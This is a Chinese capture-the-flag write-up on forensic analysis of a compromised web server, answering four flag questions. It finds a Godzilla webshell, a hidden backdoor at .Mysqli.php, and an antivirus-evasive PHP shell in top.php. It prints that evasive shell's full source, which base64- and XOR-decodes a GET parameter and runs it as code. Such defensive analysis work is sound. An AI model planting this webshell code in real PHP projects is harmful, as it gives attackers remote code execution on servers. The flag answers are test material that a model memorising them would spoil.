靶机账号密码 root xjwebshell
1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}
2.黑客使用的什么工具的shell github地址的md5 flag{md5}
3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx
4.黑客免杀马完整路径 md5 flag{md5}

1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}

tar -cvf web.tar /var/www/html

 

将web服务端打包下载下来

D盾扫描

 

 

flag{027ccd04-5065-48b6-a32d-77c704a5e26d}

2.黑客使用的什么工具的shell github地址的md5 flag{md5}

 

哥斯拉特征

https://github.com/BeichenDream/Godzilla

 

flag{39392DE3218C333F794BEFEF07AC9257}

3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx

 

可以看出隐藏后门是.Mysqli.php

/var/www/html/include/Db/.Mysqli.php

 

flag{AEBAC0E58CD6C5FAD1695EE4D1AC1919}

4.黑客免杀马完整路径 md5 flag{md5}

什么是免杀马？

免杀马（免杀病毒或免杀Webshell）是指经过特殊处理和混淆，使其能够避开杀毒软件和安全检测工具识别的恶意软件或后门程序。黑客使用各种技术手段，使恶意代码看起来像是正常代码，从而躲避签名检测和基于规则的安全机制。这种技术通常用于Webshell和其他后门程序，目的是保持对受害系统的隐蔽访问。

 

通过日志分析可知

top.php?1=phpinfo();

攻击者通过top.php这个文件查看了php版本信息

 

D盾也可以

<?php$key = "password";//ERsDHgEUC1hI
$fun = base64_decode($_GET['func']);
for($i=0;$i<strlen($fun);$i++){$fun[$i] = $fun[$i]^$key[$i+1&7];
}
$a = "a";
$s = "s";
$c=$a.$s.$_GET["func2"];
$c($fun);

这段代码

为什么可以确认是恶意文件？

• 混淆和隐藏：

• • 使用Base64编码和字符异或操作来混淆代码。这些技术通常用于隐藏恶意代码，避免被直接检测到。

• 动态执行：

• • 动态生成并调用函数。这种模式允许攻击者通过URL参数传递任意代码并在服务器上执行，具有极大的危险性。

• 外部输入：

• • 使用$_GET参数来控制代码行为。通过外部输入来决定代码逻辑，使得攻击者可以远程控制服务器，执行任意PHP代码。

/var/www/html/wap/top.php

 

flag{EEFF2EABFD9B7A6D26FC1A53D3F7D1DE}